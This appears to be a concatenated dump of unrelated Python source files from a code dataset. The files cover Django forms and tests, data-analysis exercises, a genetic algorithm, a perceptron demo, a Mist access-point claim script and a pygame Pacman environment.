help='Port number to connect to.')
args = parser.parse_args()
self._port = args.port[0]
#end def
def _get_auth_key(self):
try: self._auth = sys.stdin.readline().strip('\n')
except: self._auth = None
#end def
def _connect(self):
if self._port is None: return False
try: self._con = mpc.Client(('localhost', self._port),
authkey=self._auth)
except mpc.AuthenticationError, e:
self._err.write('Cannot connect to the port %d\n%s\n' % (self._port,str(e)))
return False
except:
traceback.print_exc()
return False
return True
#end def
def _report_to_server(self):
if self._con is None: return
self._con.send(None)
#end def
def _disconnect(self):
if self._con is None: return
self._con.close()
self._con = None
#end def
@abc.abstractmethod
def _initialize(self): pass
@abc.abstractmethod
def _do_work(self, data): pass
def _main(self):
#check if run from a tty
if self._check_tty(): return 1
#set std streams
sys.stderr = self._err
sys.stdout = self._out
#set signal handlers
self._set_sig_handlers()
#initialize
if not self._initialize():
print 'Unable to initialize.\n'
return 2
#parse commandline arguments
self._parse_args()
#get auth key
self._get_auth_key()
#try to connect and get data
if not self._connect(): return 3
data = self._con.recv()
#start abort signal listener
abort_listner = SignalListener(self._con, self._abort_event)
abort_listner.start()
#do the work, report back
result = self._do_work(data)
self._report_to_server()
#join abort listener
abort_listner.join()
#close connection
self._disconnect()
return 0 if result == 0 else 3+result
#end def
def __call__(self, sys_exit=True, *args, **kwargs):
try: ret = self._main()
except SystemExit, e:
if sys_exit: sys.exit(e.code)
else: return e.code
except:
print 'Unhandled exception:'
traceback.print_exc()
if sys_exit: sys.exit(1)
else: return 1
if sys_exit: sys.exit(ret or 0)
else: return 0
#end class |
12,406 | 77487abd7eb4e966dff682fd1308da323c569f82 | from __future__ import annotations
import itertools
import ibis
import ibis.expr.operations as ops
def _reduction_format(translator, func_name, where, arg, *args):
if where is not None:
arg = ops.Where(where, arg, ibis.NA)
return "{}({})".format(
func_name,
", ".join(map(translator.translate, itertools.chain([arg], args))),
)
def reduction(func_name):
def formatter(translator, op):
*args, where = op.args
return _reduction_format(translator, func_name, where, *args)
return formatter
def variance_like(func_name):
func_names = {
"sample": f"{func_name}_samp",
"pop": f"{func_name}_pop",
}
def formatter(translator, op):
return _reduction_format(translator, func_names[op.how], op.where, op.arg)
return formatter
def count_distinct(translator, op):
if op.where is not None:
arg_formatted = translator.translate(ops.Where(op.where, op.arg, None))
else:
arg_formatted = translator.translate(op.arg)
return f"count(DISTINCT {arg_formatted})"
|
12,407 | 015c01cd3032a5669096626d21e166e44ebdfc9a | import codecademylib
import pandas as pd
ad_clicks = pd.read_csv('ad_clicks.csv')
ad_clicks.head(10)
ad_clicks.groupby('utm_source')\
.user_id.count()\
.reset_index()
ad_clicks['is_click'] = ~ad_clicks\
.ad_click_timestamp.isnull()
clicks_by_source = ad_clicks\
.groupby(['utm_source',
'is_click'])\
.user_id.count()\
.reset_index()
clicks_pivot = clicks_by_source\
.pivot(index='utm_source',
columns='is_click',
values='user_id')\
.reset_index()
clicks_pivot['percent_clicked'] = \
clicks_pivot[True] / \
(clicks_pivot[True] +
clicks_pivot[False])
ad_clicks.groupby('experimental_group')\
.user_id.count().reset_index()
percentage_clicks = ad_clicks.groupby(['experimental_group', 'is_click',]).user_id.count().reset_index()
percentage_clicks['percentage'] = percentage_clicks['user_id']/ad_clicks.shape[0]
a_clicks= ad_clicks[
ad_clicks.experimental_group
== 'A']
b_clicks= ad_clicks[
ad_clicks.experimental_group
== 'B']
day_groups= a_clicks.groupby('day').user_id.count().reset_index()
day_groups['percentage'] = day_groups['user_id']/a_clicks.shape[0]
print(clicks_pivot)
|
12,408 | dc702462f7e9f15398bc0825d4513b27c12b50d2 | """
Consider three situations:
* delete at the beginning
* delete at the middle
* delete at the end
"""
from utils import ListNode, stringToListNode, prettyPrintLinkedList
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
# Two pass
# lenList = 0
# h = head
# while h is not None:
# lenList += 1
# h = h.next
# cnt = 0
# curr = head
# prev = None
# while True:
# if cnt == lenList - n:
# if prev is None:
# return curr.next
# else:
# prev.next = curr.next
# return head
# prev = curr
# curr = curr.next
# cnt += 1
# One pass
# prev, fast, slow = None, head, head
# for i in range(n):
# fast = fast.next
# while fast:
# prev = slow
# slow = slow.next
# fast = fast.next
# if prev is None:
# return slow.next
# else:
# prev.next = slow.next
# return head
nodes = []
curr = head
while curr:
nodes.append(curr)
curr = curr.next
if len(nodes) > n:
node = nodes[len(nodes) - n - 1]
if node.next is not None:
node.next = node.next.next
else:
head = head.next
return head
if __name__ == "__main__":
lst = stringToListNode("[1, 2, 3, 4, 5]")
lst = Solution().removeNthFromEnd(lst, 2)
prettyPrintLinkedList(lst)
lst = stringToListNode("[1, 2, 3, 4, 5]")
lst = Solution().removeNthFromEnd(lst, 1)
prettyPrintLinkedList(lst)
lst = stringToListNode("[1, 2, 3, 4, 5]")
lst = Solution().removeNthFromEnd(lst, 5)
prettyPrintLinkedList(lst)
|
12,409 | 608a582990dfb008ec9d05b669fc775f465053e1 | from django.contrib import admin
# Register your models here.
from .models import *
@admin.register(LunBo)
class LunBoAdmin(admin.ModelAdmin):
list_display = ('title',)
@admin.register(Index)
class IndexAdmin(admin.ModelAdmin):
list_display = ('title',)
|
12,410 | 97535cab299032007ad40739ed6eef34df248177 | import random
import statistics
import time
from collections import defaultdict
from functools import reduce
from matplotlib import pyplot as pl
from settings import TOTAL_ROWS, RAIL_ROAD_ENTRANCE_ID
from utils import display_dictionary
from utils import load_maps, getEdgesDict, GeoUtils
class Environment:
# population_size = 100
# gene_size = 50 - 1
# generation_kill = 10
# mutation_factor = 1000
population_size = 300
gene_size = 200
new_childs = 25
new_immigrants = 25
generation_kill = new_childs + new_immigrants
mutation_factor = 1000
current_best = float("inf")
def print_stats(self):
l = [p.fitness for p in self.population]
maxi = max(l)
mini = min(l)
sumi = sum(l)
avgi = sumi / len(self.population)
stdi = statistics.stdev(l)
# print(f"max {maxi}, min {mini}, avg {avgi}, std dev {stdi}")
self.stats["max"].append(maxi)
self.stats["min"].append(mini)
self.stats["avg"].append(avgi)
self.stats["std"].append(stdi)
def display_stats(self):
x_size = len(self.stats["max"])
pl.plot([x for x in range(x_size)], self.stats["max"], label="max")
pl.plot([x for x in range(x_size)], self.stats["min"], label="min")
pl.plot([x for x in range(x_size)], self.stats["avg"], label="avg")
pl.plot([x for x in range(x_size)], self.stats["std"], label="std")
pl.legend()
pl.show()
def __init__(self, attractions_map, edges_dict):
self.attractions_map = attractions_map
self.edges_dict = edges_dict
self.population = []
self.stats = defaultdict(list)
self.GeoHelper = GeoUtils(attractions_map)
def loadPopulation(self):
for i in range(self.population_size):
sol = Env_Solution(self, gene_size=self.gene_size)
sol.create_genes()
self.population.append(sol)
def sort(self):
self.population.sort(key=lambda x: x.fitness, reverse=False)
def end_generation(self):
self.sort()
if self.current_best > self.population[0].fitness:
print(f"new best: {self.current_best} to {self.population[0].fitness}, and path size {len(self.population[0].path)} ")
self.current_best = self.population[0].fitness
for i in range(self.generation_kill):
self.population.pop()
random_indexes = [random.randint(0, self.population_size - self.generation_kill - 1) for i in
range(self.generation_kill * 2)]
new_candidates = []
for _ in range(self.new_childs):
candidate = self.crossover(self.population[random_indexes.pop()], self.population[random_indexes.pop()])
new_candidates.append(candidate)
# for i in range(self.generation_kill):
# sol = Env_Solution(self, gene_size=self.gene_size)
# sol.create_genes()
# new_candidates.append(sol)
if random.randint(1, self.mutation_factor) == 1:
new_candidates[0].mutate()
immigrants = [ Env_Solution(self, gene_size=self.gene_size, create_genes=True) for _ in range(self.new_immigrants) ]
self.population.extend(new_candidates + immigrants)
def display_best_solution(self):
edges = self.population[0].getEdges()
display_dictionary(self.attractions_map, edges)
# print("done")
for (source_id, target_id) in edges:
print(self.attractions_map[source_id]["name"])
self.final_edges = edges
print(self.attractions_map[target_id]["name"])
def crossover(self, sol1, sol2):
commons = sol1.path_set.intersection(sol2.path_set)
needle = commons.pop()
index1 = sol1.path.index(needle)
index2 = sol2.path.index(needle)
path = [sol1.path[i] for i in range(index1 + 1)]
path2 = [sol2.path[i] for i in range(index2 + 1, len(sol2.path))]
path += path2
# path = [sol1.path[i] if i <= index else sol2.path[i] for i in range(self.gene_size)]
sol3 = Env_Solution(self, gene_size=len(path))
sol3.put_genes(genes=path)
return sol3
class Env_Solution:
# size = 50 - 1
start_pos = RAIL_ROAD_ENTRANCE_ID
def __init__(self, env, gene_size, create_genes=False):
self.path = [RAIL_ROAD_ENTRANCE_ID, ]
# self.curr = self.start_pos
self.env = env
self.size = gene_size
if create_genes:
self.create_genes()
def getEdges(self):
p1 = self.path[0]
myedges = []
# print(f" path size {self.path_size}, and array size {len(self.path)}")
# for i in range(1, self.path_size+1):
for i in range(1, len(self.path)):
try:
myedges.append((p1, self.path[i]))
except Exception as e:
print(e)
raise e
p1 = self.path[i]
return myedges
def mutate(self):
mutation_start = random.randint(0, len(self.path)-1)
curr = self.path[mutation_start]
for i in range(mutation_start + 1, len(self.path)):
rnd_i = random.randint(0, len(self.env.edges_dict[curr]) - 1)
curr = self.env.edges_dict[curr][rnd_i]
self.path[i] = curr
self.path_set = set(self.path)
self.get_fitness()
def put_genes(self, genes):
self.path = genes
self.path_set = set(genes)
self.get_fitness()
def create_genes(self):
curr = self.start_pos
self.path = [0] * self.size
self.path[0] = curr
# visited = set()
for i in range(1, self.size):
rnd_i = random.randint(0, len(self.env.edges_dict[curr]) - 1)
curr = self.env.edges_dict[curr][rnd_i]
self.path[i] = curr
self.path_set = set(self.path)
self.get_fitness()
# @profile
def get_fitness(self):
distance = 0
# did not find all the rides
diff = TOTAL_ROWS - len(set(self.path))
# self.path_size = len(self.path)
# if diff > 0:
# penalty for each ride missing
distance += (diff * 1000)
# tmp = distance
# else:
good_path = set()
for idx, val in enumerate(self.path):
good_path.add(val)
if len(good_path) == TOTAL_ROWS:
# self.path_size = idx
# print(f"smaller {path_size}, total {len(self.path)}")
break
self.path = self.path[:idx+1]
# t1 = time.time()
# # self.path_size = path_size
# distance2 = distance
# for r in range(1, path_size):
# tmp += self.env.GeoHelper.get_distance(self.path[r - 1], self.path[r])
# t2 = time.time()
# distance = reduce(
# lambda tot, curr: tot + self.env.GeoHelper.get_distance(self.path[curr - 1], self.path[curr])
# , (i for i in range(1, len(self.path))), distance)
distance = reduce(
lambda tot, curr: tot + self.env.edges_dict[ (self.path[curr - 1], self.path[curr]) ]
, (i for i in range(1, len(self.path))), distance)
# t3 = time.time()
self.fitness = distance
# print(f"loop took {t2-t1} , reduce took {t3-t2}")
# print(tmp, distance, "blah")
if __name__ == "__main__":
t1 = time.time()
attraction_map = load_maps()
Island = Environment(attraction_map, getEdgesDict(attraction_map) )
Island.loadPopulation()
max_time = 60*60*1/60 #1hour
t1 = time.time()
# for i in range(100): # use 1000
while (time.time() - t1 ) < 1:
for i in range(1000):
Island.end_generation()
Island.print_stats()
# Island.population[0].mutate()
Island.display_stats()
Island.display_best_solution()
print(Island.population[0].fitness)
print(f"took: {time.time() - t1}")
pass
|
12,411 | c36e2c61b5f5f00a032149338272cd889871aa0c | #!/usr/bin/env python
# coding: utf-8
# # Coding a Single Perceptron
# This file illustrates a single perceptron with two input variables that uses the sign function as its activation function. It is demonstrated that such a perceptron can represent every boolean function except for XOR() and XNOR().
# In[2]:
import numpy as np
import pandas as pd
# In[3]:
def perceptron(inputs, weights): #computes the output of a single perceptron
linear_sum = 0
for i in range(0, len(inputs)):
linear_sum += inputs[i]*weights[i]
if linear_sum > 0:
sign = 1
else:
sign = -1
return sign
# In[4]:
def update_weights(weights, inputs, target, output, learning_rate): #updates weights for a single perceptron for a single training example
for i in range(0, len(inputs)):
weights[i] = weights[i] + learning_rate * (target - output) * inputs[i]
return weights
# In[5]:
def train_perceptron(train_x, train_y, weights_init, iterations, learning_rate): #trains single perceptron weights
weights = weights_init
for i in range(0, iterations): # iterate through all training examples n times
for j in range(0, len(train_x)):
output = perceptron(train_x[j], weights)
if output != train_y[j]: #only update weights if example is misclassified
weights = update_weights(weights, train_x[j], train_y[j], output, learning_rate)
training_results = []
for j in train_x:
training_results.append(perceptron(j, weights))
return weights, training_results
# In[6]:
train_x = [[1, 0, 0], [1, 1, 0], [1, 0, 1], [1, 1, 1]]
weights_init = [0, 0, 0] #initialize weights to 0
iterations = 10
learning_rate = .2
# In[8]:
boolean = {"false_" : {"target": [-1, -1, -1, -1]},
"and_" : {"target": [-1, -1, -1, 1]},
"a_and_not_b" : {"target": [-1, 1, -1, -1]},
"a_": {"target": [-1, 1, -1, 1]},
"not_a_and_b" : {"target": [-1, -1, 1, -1]},
"b_" : {"target": [-1, -1, 1, 1]},
"x_or" : {"target": [-1, 1, 1, -1]},
"or_" : {"target": [-1, 1, 1, 1]},
"nor_" : {"target": [1, -1, -1, -1]},
"x_nor" : {"target": [1, -1, -1, 1]},
"not_b" : {"target": [1, 1, -1, -1]},
"a_or_not_b" : {"target": [1, 1, -1, 1]},
"not_a" : {"target": [1, -1, 1, -1]},
"not_a_or_b": {"target": [1, -1, 1, 1]},
"nand" : {"target": [1, 1, 1, -1]},
"true_" : {"target": [1, 1, 1, 1]}}
# In[9]:
results = {}
for i in boolean:
boolean[i]["final_weights"], results[i] = train_perceptron(train_x, boolean[i]["target"], weights_init, iterations, learning_rate)
if results[i] == boolean[i]["target"]:
boolean[i]["Status"] = "Success"
else:
boolean[i]["Status"] = "Failure"
# In[10]:
df = pd.DataFrame(boolean).transpose()
df #shows that a single perceptron can represent any boolean valued function except for: "XOR" and "XNOR"
|
12,412 | 653446e1d5544c858a27dcbd5ae5d1be31d8235b | import copy
from datetime import datetime, timedelta
from django.utils import timezone
from utils.api.tests import APITestCase
from .models import ContestAnnouncement, ContestRuleType, Contest
DEFAULT_CONTEST_DATA = {"title": "test title", "description": "test description",
"start_time": timezone.localtime(timezone.now()),
"end_time": timezone.localtime(timezone.now()) + timedelta(days=1),
"rule_type": ContestRuleType.ACM,
"password": "123",
"allowed_ip_ranges": [],
"visible": True, "real_time_rank": True}
class ContestAdminAPITest(APITestCase):
def setUp(self):
self.create_super_admin()
self.url = self.reverse("contest_admin_api")
self.data = copy.deepcopy(DEFAULT_CONTEST_DATA)
def test_create_contest(self):
response = self.client.post(self.url, data=self.data)
self.assertSuccess(response)
return response
def test_create_contest_with_invalid_cidr(self):
self.data["allowed_ip_ranges"] = ["127.0.0"]
resp = self.client.post(self.url, data=self.data)
self.assertTrue(resp.data["data"].endswith("is not a valid cidr network"))
def test_update_contest(self):
id = self.test_create_contest().data["data"]["id"]
update_data = {"id": id, "title": "update title",
"description": "update description",
"password": "12345",
"visible": False, "real_time_rank": False}
data = copy.deepcopy(self.data)
data.update(update_data)
response = self.client.put(self.url, data=data)
self.assertSuccess(response)
response_data = response.data["data"]
for k in data.keys():
if isinstance(data[k], datetime):
continue
self.assertEqual(response_data[k], data[k])
def test_get_contests(self):
self.test_create_contest()
response = self.client.get(self.url)
self.assertSuccess(response)
def test_get_one_contest(self):
id = self.test_create_contest().data["data"]["id"]
response = self.client.get("{}?id={}".format(self.url, id))
self.assertSuccess(response)
class ContestAPITest(APITestCase):
def setUp(self):
user = self.create_admin()
self.contest = Contest.objects.create(created_by=user, **DEFAULT_CONTEST_DATA)
self.url = self.reverse("contest_api") + "?id=" + str(self.contest.id)
def test_get_contest_list(self):
url = self.reverse("contest_list_api")
response = self.client.get(url + "?limit=10")
self.assertSuccess(response)
self.assertEqual(len(response.data["data"]["results"]), 1)
def test_get_one_contest(self):
resp = self.client.get(self.url)
self.assertSuccess(resp)
def test_regular_user_validate_contest_password(self):
self.create_user("test", "test123")
url = self.reverse("contest_password_api")
resp = self.client.post(url, {"contest_id": self.contest.id, "password": "error_password"})
self.assertDictEqual(resp.data, {"error": "error", "data": "Wrong password or password expired"})
resp = self.client.post(url, {"contest_id": self.contest.id, "password": DEFAULT_CONTEST_DATA["password"]})
self.assertSuccess(resp)
def test_regular_user_access_contest(self):
self.create_user("test", "test123")
url = self.reverse("contest_access_api")
resp = self.client.get(url + "?contest_id=" + str(self.contest.id))
self.assertFalse(resp.data["data"]["access"])
password_url = self.reverse("contest_password_api")
resp = self.client.post(password_url,
{"contest_id": self.contest.id, "password": DEFAULT_CONTEST_DATA["password"]})
self.assertSuccess(resp)
resp = self.client.get(self.url)
self.assertSuccess(resp)
class ContestAnnouncementAdminAPITest(APITestCase):
def setUp(self):
self.create_super_admin()
self.url = self.reverse("contest_announcement_admin_api")
contest_id = self.create_contest().data["data"]["id"]
self.data = {"title": "test title", "content": "test content", "contest_id": contest_id, "visible": True}
def create_contest(self):
url = self.reverse("contest_admin_api")
data = DEFAULT_CONTEST_DATA
return self.client.post(url, data=data)
def test_create_contest_announcement(self):
response = self.client.post(self.url, data=self.data)
self.assertSuccess(response)
return response
def test_delete_contest_announcement(self):
id = self.test_create_contest_announcement().data["data"]["id"]
response = self.client.delete("{}?id={}".format(self.url, id))
self.assertSuccess(response)
self.assertFalse(ContestAnnouncement.objects.filter(id=id).exists())
def test_get_contest_announcements(self):
self.test_create_contest_announcement()
response = self.client.get(self.url + "?contest_id=" + str(self.data["contest_id"]))
self.assertSuccess(response)
def test_get_one_contest_announcement(self):
id = self.test_create_contest_announcement().data["data"]["id"]
response = self.client.get("{}?id={}".format(self.url, id))
self.assertSuccess(response)
class ContestAnnouncementListAPITest(APITestCase):
def setUp(self):
self.create_super_admin()
self.url = self.reverse("contest_announcement_api")
def create_contest_announcements(self):
contest_id = self.client.post(self.reverse("contest_admin_api"), data=DEFAULT_CONTEST_DATA).data["data"]["id"]
url = self.reverse("contest_announcement_admin_api")
self.client.post(url, data={"title": "test title1", "content": "test content1", "contest_id": contest_id})
self.client.post(url, data={"title": "test title2", "content": "test content2", "contest_id": contest_id})
return contest_id
def test_get_contest_announcement_list(self):
contest_id = self.create_contest_announcements()
response = self.client.get(self.url, data={"contest_id": contest_id})
self.assertSuccess(response)
class ContestRankAPITest(APITestCase):
def setUp(self):
user = self.create_admin()
self.acm_contest = Contest.objects.create(created_by=user, **DEFAULT_CONTEST_DATA)
self.create_user("test", "test123")
self.url = self.reverse("contest_rank_api")
def get_contest_rank(self):
resp = self.client.get(self.url + "?contest_id=" + self.acm_contest.id)
self.assertSuccess(resp)
|
12,413 | 876e642781f8a08620fda49be17319276b4fcb3f | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
# from splitjson.widgets import SplitJSONWidget
class LoginForm(forms.Form):
username = forms.CharField(label='username')
password = forms.CharField(widget=forms.PasswordInput)
is_cross = forms.BooleanField(initial=False, required=False)
class NewApplicationForm(forms.Form):
startdate = forms.DateField()
enddate = forms.DateField()
description = forms.CharField(max_length=300)
class RequestForm(forms.Form):
comments = forms.CharField(max_length=300)
faculty_id = forms.IntegerField()
verdict = forms.ChoiceField(
choices=((0, 0), (1, 1,), (2, 2)), widget=forms.RadioSelect)
class ResponseForm(forms.Form):
comments = forms.CharField(max_length=300)
entryid = forms.IntegerField()
class AppointmentForm(forms.Form):
post_id = forms.IntegerField()
new_fac_id = forms.IntegerField()
class NewCourseForm(forms.Form):
course_code = forms.CharField(max_length=10)
course_name = forms.CharField(max_length=200)
class NewPublicationForm(forms.Form):
authors = forms.CharField(max_length=300)
journal_name = forms.CharField(max_length=300)
year = forms.IntegerField()
class bgform(forms.Form):
desc = forms.CharField(max_length=400)
class PublicationForm(forms.Form):
is_delete = forms.IntegerField()
pub_id = forms.FloatField()
authors = forms.CharField(max_length=350)
journ_name = forms.CharField(max_length=300)
year = forms.IntegerField()
class CoursesForm(forms.Form):
c_id = forms.FloatField()
is_delete = forms.IntegerField()
c_code = forms.CharField(max_length=350)
c_name = forms.CharField(max_length=300)
|
12,414 | 4e559086d6ebe20cd03a996db98e63a62e23d592 | import os
import numpy as np
from skimage.morphology import dilation, ball
from skimage.external import tifffile
from scipy import ndimage
import time
def direct_field3D(a):
b, ind = ndimage.distance_transform_edt(a, return_indices=True)
c = np.array(np.unravel_index(np.arange(a.size), shape=a.shape)).reshape(3, *a.shape)
direction = ind - c
direction[..., b==0] = -1
dr = np.power(np.power(direction, 2).sum(axis=0), 0.5)
direction = direction / dr
theta = np.arccos(direction[2, ...] / dr)
phi = np.arctan2(direction[1, ...], direction[0, ...])
direction[..., b==0] = 0
direct_vis = (theta + 10) * 100 + (phi + 10) * 100
direct_vis[b==0] = 0
return direction, direct_vis
def process_a_tif(tif_path):
tif = tifffile.imread(tif_path)
tif_d = dilation(tif, ball(1))
df = direct_field3D(tif_d)
return df
tif_path = "./3450_31350_5150.tif"
s = time.time()
df, direct_vis = process_a_tif(tif_path)
print("time:", time.time()-s)
|
12,415 | b760e9893113d60cdc0fae118f506114a6eed7fb | #!/usr/bin/env python3
"""
Written by Francois Verges (@VergesFrancois)
Created on: May 12, 2020
This script claims an AP within your Mist Organization of choice
All the configuration details are coming from the 'config.json' file
"""
import argparse
import time
import json
import requests
def claim_ap(configs):
"""
This function claims an AP to an organization
API Call Used: POST https://api.mist.com/api/v1/orgs/:org_id/inventory
Parameters:
- configs: Dictionary containing all configurations information
Returns:
- ID of the AP
"""
data_post = f"[\"{configs['ap']['claim-code']}\"]"
api_url = f"{configs['api']['mist_url']}orgs/{configs['api']['org_id']}/inventory"
headers = {'Content-Type': 'application/json',
'Authorization': f"Token {configs['api']['token']}"}
response = requests.post(api_url, data=data_post, headers=headers)
claim_response = json.loads(response.content.decode('utf-8'))
# print(json.dumps(claim_response, indent=4, sort_keys=True))
if claim_response['error']:
print(f"ERROR: The AP was NOT claimed.\t\t Reason: {claim_response['reason'][0]}")
elif claim_response['inventory_added']:
print(f"{configs['ap']['mac']} AP has been claimed to organization {configs['api']['org_id']}")
elif claim_response['duplicated']:
print(f"{configs['ap']['mac']} AP has already been claimed to this organization.")
return()
def main():
"""
This function claims a Mist AP to a specific Organization
"""
parser = argparse.ArgumentParser(description='Creates a Mist site within your organization')
parser.add_argument('config', metavar='config_file', type=argparse.FileType(
'r'), help='file containing all the configuration information')
args = parser.parse_args()
configs = json.load(args.config)
claim_ap(configs)
if __name__ == '__main__':
start_time = time.time()
print('** Claiming Mist AP...\n')
main()
run_time = time.time() - start_time
print("")
print("** Time to run: %s sec" % round(run_time, 2))
|
12,416 | 3ff9d81862efffba01ea7ae7211d03d53ad94b4d | import pygame, random, time, numpy as np
from multiprocessing import Pipe
import os
class PacmanEnv():
def __init__(self, num_episodes=4, scale=5, move_left=.8, is_beneficial=.8, speed=5, update_freq=20,
reward=200, punishment = 500, time_bw_epi=5, display=True, hangtime=2, deviate=1,
win_value=-1):
#set width and height of gameboard
self.width = int(scale*100)
self.height = int(self.width/3)
#initial pacman and character coordinates and set size of components
self.character_size = int(self.width / 8)
self.x_pacman, self.y_pacman = (int((self.width / 2) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
self.x_entity1, self.y_entity1 = (int((1 * self.width / 5) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
self.x_entity2, self.y_entity2 = (int((4 * self.width / 5) - (self.character_size / 2)), int((self.height / 2) - (self.character_size / 2)))
self.distance_to_entities = abs(self.x_pacman-self.x_entity1)
#if the random float is less than .8, then this episode's right state is beneficial
self.b = is_beneficial
self.l = move_left
self.is_beneficial = random.uniform(0,1) <= self.b
self.move_left = random.uniform(0, 1) <= self.l
self.update_freq = update_freq #this is approximately the average update frequency from tests
# self.clock = pygame.time.Clock()
self.speed_initial = speed
self.pixels_per_second = self.update_freq * self.speed_initial
#I'm not sure why I have to multiply this value by 2. idk
self.episode_duration = (self.distance_to_entities/self.pixels_per_second) + hangtime
self.hangtime = hangtime
self.epi_type = 0b00
self.num_episodes = num_episodes
self.win_value = move_left*is_beneficial*reward + (1-move_left)*is_beneficial*(-punishment) + move_left*(1-is_beneficial)*(-punishment) + (1-move_left)*(1-is_beneficial)*(reward)
self.win_value = self.win_value*num_episodes
if (win_value != -1):
self.win_value = win_value
# print("episode duration",self.episode_duration)
if(self.move_left):
self.speed = -self.speed_initial
else:
self.speed = self.speed_initial
self.reward, self.punishment = (reward, punishment) # .75(+200) + .25(-400) = +50. A naive approach favors going toward state of interest in absence of info about state value.
if(display):
self.score = 0
self.time_between_episodes = time_bw_epi #seconds
self.last_change = 0
self.num_wins = int(((self.win_value/self.num_episodes + self.punishment)*self.num_episodes)/(self.reward+self.punishment)) + deviate
self.num_losses = self.num_episodes - self.num_wins
self.sequence = [1]*self.num_wins
self.sequence = np.asarray(self.sequence + [0]*self.num_losses)
np.random.shuffle(self.sequence)
self.cur_dir = os.getcwd()
#returns estimated duration of episode in seconds
def get_duration(self):
return self.episode_duration
#initialize other stuff
def load_stuff(self):
# initialize gameboard
self.game_display = pygame.display.set_mode((self.width, self.height))
self.clock = pygame.time.Clock()
# pacman yellow rgb values
self.pacman_yellow = (255, 238, 0)
# load images
self.score_font = pygame.font.SysFont("arial", int(self.width * (2 / 30)), bold=True)
self.secondary_score_font = pygame.font.SysFont("arial", int(self.width * (1.5 / 30)), bold=False)
self.pacman_image = pygame.transform.scale(pygame.image.load(self.cur_dir+'/environment/images/pacman.png'), (self.character_size, self.character_size))
if (self.move_left):
self.pacman_image = pygame.transform.flip(self.pacman_image, 1, 0)
self.maze = pygame.transform.scale(
pygame.image.load(self.cur_dir+'/environment/images/pacman_maze.png'),
(self.width, self.height))
self.ghost_image = pygame.transform.scale(
pygame.image.load(self.cur_dir+'/environment/images/pacman_pinky.png'),
(self.character_size, self.character_size))
self.strawberry_image = pygame.transform.scale(pygame.image.load(
self.cur_dir+'/environment/images/pacman_strawberry.png'),
(self.character_size, self.character_size))
self.score_text = self.score_font.render("{0}".format(self.score), 1, self.pacman_yellow)
self.vert = pygame.transform.scale(
pygame.image.load(self.cur_dir+'/environment/images/circle.png'),
(int(self.character_size * 1.2), int(self.character_size * 1.2)))
self.vert = pygame.transform.rotate(self.vert, 90)
# reposition pacman
def update_pacman(self):
self.game_display.blit(self.pacman_image, (self.x_pacman,self.y_pacman))
#update entity positions and background
def update_constants(self):
self.game_display.blit(self.maze, (0, 0))
if(self.is_beneficial):
self.game_display.blit(self.strawberry_image, (self.x_entity1, self.y_entity1))
self.game_display.blit(self.ghost_image, (self.x_entity2, self.y_entity2))
else:
self.game_display.blit(self.strawberry_image, (self.x_entity2, self.y_entity2))
self.game_display.blit(self.ghost_image, (self.x_entity1, self.y_entity1))
#update the type of this episode
def record_episode_type(self):
if(self.is_beneficial and self.move_left):
self.epi_type = 0
elif(not self.is_beneficial and self.move_left):
self.epi_type = 1
elif(self.is_beneficial and not self.move_left):
self.epi_type = 2
else:
self.epi_type = 3
#update score text graphic
def update_remaining_epi(self, multi_ep, epi_rem):
self.game_display.blit(self.maze, (0, 0))
str = "Score: {0}".format(self.score)
score_to_beat = "High score: {0}".format(int(self.win_value))
str2 = "{0} episodes remaining".format(epi_rem)
self.episodes_remaining_text = self.secondary_score_font.render(str2, 1, self.pacman_yellow)
self.score_text = self.score_font.render(str, 1, self.pacman_yellow)
self.win_value_text = self.secondary_score_font.render(score_to_beat, 1, self.pacman_yellow)
self.game_display.blit(self.score_text, (30, 5))
self.game_display.blit(self.episodes_remaining_text, (30, 70))
self.game_display.blit(self.win_value_text, (350, 10))
#returns true if pacman is near either of the two entities
def overlapping(self):
if(abs(self.x_pacman-self.x_entity1) < .5*self.character_size or abs(self.x_pacman-self.x_entity2) < .5*self.character_size):
return True
else:
return False
def nearby(self):
if (abs(self.x_pacman - self.x_entity1) < 1.5 * self.character_size or abs(
self.x_pacman - self.x_entity2) < 1.5 * self.character_size):
return True
else:
return False
#resets the environment for a new episode
def reset_env(self):
# if is_beneficial, the reward state is on the left. If not, the reward state is on the right.
# if move_left, pacman moves left in this episode. If not, pacman moves right.
# therefore, two of the four game states incur reward. is_ben && move_left, and !is_ben && !move_left
if ((self.is_beneficial and self.move_left) or (not self.is_beneficial and not self.move_left)):
# self.score += self.reward
self.last_change = self.reward
else:
# self.score -= self.punishment
self.last_change = -self.punishment
# roll dice to determine new gamestate. (four possibilities)
# self.is_beneficial = random.uniform(0, 1) <= self.b
# self.move_left = random.uniform(0, 1) <= self.l
#recenters pacman on screen
def reposition_pacman(self):
self.x_pacman = int((self.width / 2) - (self.character_size / 2))
def set_speed_direction(self):
# reset pacman
self.pacman_image = pygame.transform.scale(pygame.image.load(self.cur_dir+'/environment/images/pacman.png'),(self.character_size, self.character_size))
if (self.move_left):
self.pacman_image = pygame.transform.flip(self.pacman_image, 1, 0)
self.reposition_pacman()
if (self.move_left):
self.speed = -self.speed_initial
else:
self.speed = self.speed_initial
#checks if the player has won the game
def did_win(self):
if(self.score >= self.win_value):
return True
return False
#simluates num_episodes of the simulation
def simulate(self, num_episodes=10):
clock = pygame.time.Clock()
pygame.init()
self.load_stuff()
#the game is not initially crashed
self.num_episodes=num_episodes
crashed = False
counter = 0
record_times = []
while not crashed and self.num_episodes>0:
if (counter == 50):
l = np.average(np.diff(record_times))
print("average receive frequency:", 1 / l, "Hz")
record_times = []
counter = 0
current_time = time.time()
record_times.append(current_time)
counter += 1
#check if game has crashed and exit loop if it has
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
print("Game killed.")
self.update_constants()
#update pacman's position according to speed variable
self.x_pacman += self.speed
self.update_pacman()
#update game state for new episode
if(self.overlapping()):
self.reset_env()
self.num_episodes-=1
time.sleep(self.time_between_episodes)
self.update_remaining_epi(multi_ep=True)
pygame.display.update()
#update pygame state
clock.tick(self.update_freq)
pygame.quit()
quit()
#obscures the initial direction of pacman
def obscure_dir(self):
self.game_display.blit(self.vert, (self.x_pacman-7,self.y_pacman-8))
#defines screen after each episode
def immediate_change(self):
self.game_display.blit(self.maze, (0, 0))
if(self.last_change > 0):
str2 = "+ {0} points".format(self.last_change)
else:
str2 = "{0} points".format(self.last_change)
